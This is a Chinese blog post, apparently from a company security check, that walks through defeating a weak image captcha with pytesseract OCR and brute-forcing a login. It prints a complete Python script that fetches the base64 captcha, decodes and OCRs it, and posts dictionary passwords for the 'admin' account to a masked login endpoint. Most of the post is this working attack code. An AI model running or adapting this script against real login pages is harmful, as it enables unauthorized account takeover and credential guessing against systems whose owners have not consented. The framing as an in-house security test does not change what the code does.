有一段时间没更新博客了,今天正好碰到公司的一个上线系统需要做安全检查同时有图形验证码较弱的问题,这里就拿它来做例子记录下,拿到系统首先看了登录接口,发现开发还是有一定的安全意识的,图形验证码已经加入了验证且后端验证码会话也做了过期处理,但这里再看图形验证码可以发现它生成的图形是不够复杂的,相对简单,这里我就想到利用python的pytesseract模块来进行识别暴破
点击验证码抓包可以发现它这里开发是直接进行生成base64的图形编码生成
下一步我们编写的思路就是先把它识别的base64编码抓取下来用正则先处理出来,很easy用requests来进行请求就可
url=requests.get("https://xxx.xxxx.com.cn/applxxxxx/sys/randomImage/1608769685155?_t=1608769685",headers=self.headers,timeout=1)
re_re=re.compile(r'"result":"data:image/jpg;base64,(.+?)"')
re_=re.findall(re_re,url.text)
return re_
然后处理出来的base64图片编码传递给base64.b64decode进行生成图片保存到当前目录下
img_data=base64.b64decode(rere)
with open('img.jpg','wb') as f:
f.write(img_data)
f.flush()
image = Image.open("img.jpg")
code = pytesseract.image_to_string(image,config=self.tessdata_dir_config)
return (code.replace(' ','').lower().strip())
最后一步就是抓包把暴破请求数据包构造好进行批量字典猜解就可以
data_search={"remember_me":"true","username":"admin","password":password.strip(),"captcha":self.image(),"checkKey":1608769685155}
json_str = json.dumps(data_search)
url=requests.post("https://xxxx.xxxx.com.cn/login",data=json_str,headers=self.headers,timeout=1)
print(url.text,password.strip())
现在大体的结构写好之后,就可以全面构造来实现批量识别验证码进行暴力破解,如下为写好的脚本:
import pytesseract
import requests
import re
import base64
import json
import sys
from PIL import Image
class imagescan(object):
def __init__(self):
self.headers={'User-Agent':'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36','Content-Type':'application/json;charset=UTF-8'}
self.tessdata_dir_config = '--tessdata-dir "C:\Program Files (x86)\Tesseract-OCR\tessdata"'
def http(self):
try:
url=requests.get("https://xxxx.xxxx.com.cn/xxxx/sys/randoxxxxmImage/1608769685155?_t=1608769685",headers=self.headers,timeout=1)
re_re=re.compile(r'"result":"data:image/jpg;base64,(.+?)"')
re_=re.findall(re_re,url.text)
return re_
except:
pass
def image(self):
for rere in self.http():
img_data=base64.b64decode(rere)
with open('img.jpg','wb') as f:
f.write(img_data)
f.flush()
image = Image.open("img.jpg")
code = pytesseract.image_to_string(image,config=self.tessdata_dir_config)
return (code.replace(' ','').lower().strip())
def url_http(self,password):
try:
print(self.image())
data_search={"remember_me":"true","username":"admin","password":password.strip(),"captcha":self.image(),"checkKey":1608769685155}
json_str = json.dumps(data_search)
url=requests.post("https://xxxx.xxxx.com.cn/login",data=json_str,headers=self.headers,timeout=1)
print(url.text,password.strip())
except:
pass
def httpurl(self):
for pwd in open(sys.argv[1],'r+'):
self.url_http(pwd)
if __name__ == '__main__':
image_scan = imagescan()
image_scan.http()
image_scan.httpurl()
效果如图